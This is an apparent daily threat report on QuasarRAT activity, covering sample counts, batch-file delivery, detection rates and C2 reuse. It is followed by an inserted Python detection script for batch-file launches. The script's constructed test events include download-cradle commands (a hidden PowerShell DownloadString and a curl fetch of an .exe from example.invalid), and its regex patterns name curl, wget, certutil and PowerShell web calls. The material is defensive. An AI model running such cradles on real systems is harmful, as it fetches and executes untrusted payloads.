QuasarRAT - Daily Threat Report

Tuesday, May 5, 2026

Daily Summary

QuasarRAT activity remains stable with 11 new samples collected today against a 7-day average of 12, reflecting a minor 5% decline. No significant spike or drop in volume was observed, indicating ongoing low-to-moderate distribution by threat actors.

New Samples Detected

All 11 samples are Windows-compatible, with 9 portable executables (.exe) and 2 batch script files (.bat). The batch files suggest a shift toward script-based initial access payloads, potentially used to download the main RAT binary or execute persistence commands. The .exe samples show no unusual obfuscation patterns, relying on standard packing techniques.

Distribution Methods

The combination of .exe and .bat files points to phishing campaigns as the primary delivery vector. The .bat files may be attached directly to emails or hosted on compromised sites, executed manually by users. This contrasts with recent campaigns that exclusively used compiled executables, indicating a tactical diversification to bypass email attachment filters.

Detection Rate

Preliminary scans indicate that roughly 60-70% of current QuasarRAT samples are detected by major AV engines, with the .exe variants being caught at higher rates than the .bat files. The low detection of batch scripts is concerning, as they often evade signature-based detection due to their text-based nature and lack of embedded binary signatures.

C2 Infrastructure

No new C2 servers were identified today, and all 11 IOCs are newly observed hashes and filenames. This suggests attackers are reusing existing infrastructure while rotating payload hashes to avoid hash-based blocklists. Geographic patterns remain absent from available data.

7-Day Trend

Over the past week, QuasarRAT activity has been remarkably steady, with daily sample counts ranging from 10 to 14. There is no indication of an imminent campaign ramp-up or structural shift in tactics.

Security Analysis

A notable observation is the introduction of .bat file payloads alongside traditional .exe samples. This mirrors tactics seen in recent AsyncRAT campaigns, where attackers use script-based first-stage payloads to evade email gateways and EDR solutions. The .bat files likely contain download cradle commands or simple persistence mechanisms. Defensively, organizations should enable command-line logging and monitor for suspicious wget, curl, or PowerShell download strings in batch file execution. Blocking execution of .bat files from email attachments and Downloads folders is a practical recommendation.
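One way to act on the logging recommendation above, as an added example that is not part of this report or its data sources: a small Python matcher run over constructed process-creation events (Sysmon Event ID 1 style, simplified) that flags .bat launches from download/temp paths or from a mail client, and download-cradle commands spawned under cmd.exe. The field names, file paths, process names and URLs below are assumptions, not indicators from the report.

```python
import re

# Constructed sample process-creation events (simplified Sysmon Event ID 1 fields).
# These are illustrative, not taken from the report's IOC data.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\alice\Downloads\invoice_0505.bat"',
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -s -o %TEMP%\upd.exe http://example.invalid/upd.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Scripts\nightly_backup.bat"',
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
]

# Directories where a user-launched .bat from an email or browser download would land.
RISKY_BAT_DIRS = re.compile(r"\\(Downloads|INetCache|Temp|Temporary Internet Files)\\", re.I)
# Common download-cradle tokens (curl/wget/bitsadmin/certutil/PowerShell web calls).
DOWNLOAD_CRADLE = re.compile(
    r"(curl(\.exe)?\s|wget(\.exe)?\s|bitsadmin\s+/transfer|certutil.*-urlcache|"
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)", re.I)
MAIL_CLIENTS = ("outlook.exe", "thunderbird.exe")

def classify(event):
    """Return the reasons this event matches the batch-file/download-cradle guidance;
    an empty list means the event is not flagged."""
    reasons = []
    cmd, parent = event["CommandLine"], event["ParentImage"].lower()
    if ".bat" in cmd.lower() and RISKY_BAT_DIRS.search(cmd):
        reasons.append("bat launched from user-writable download/temp path")
    if ".bat" in cmd.lower() and parent.rsplit("\\", 1)[-1] in MAIL_CLIENTS:
        reasons.append("bat spawned by mail client")
    if parent.endswith("\\cmd.exe") and DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle under cmd.exe")
    return reasons

def scan(events):
    """Return (command line, reasons) for every flagged event."""
    return [(e["CommandLine"], classify(e)) for e in events if classify(e)]

if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE_EVENTS):
        print(f"ALERT: {cmdline}\n   -> {', '.join(reasons)}")
```

The scheduled backup script in the last event is not flagged, which is the point of keying on launch path and parent process rather than on the .bat extension alone.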

Further Reading

Data Sources

MalwareBazaar (abuse.ch)
ThreatFox (abuse.ch)
URLhaus (abuse.ch)
